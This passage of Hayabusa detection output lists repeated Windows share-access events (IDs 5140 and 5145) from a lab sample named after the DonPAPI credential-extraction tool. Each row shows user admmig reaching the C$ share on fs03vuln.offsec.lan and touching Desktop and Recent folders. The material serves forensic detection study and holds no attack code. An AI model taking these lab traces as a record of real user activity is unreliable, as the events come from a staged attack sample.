0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.286 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.305 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\baretail - Shortcut.lnk | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.308 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 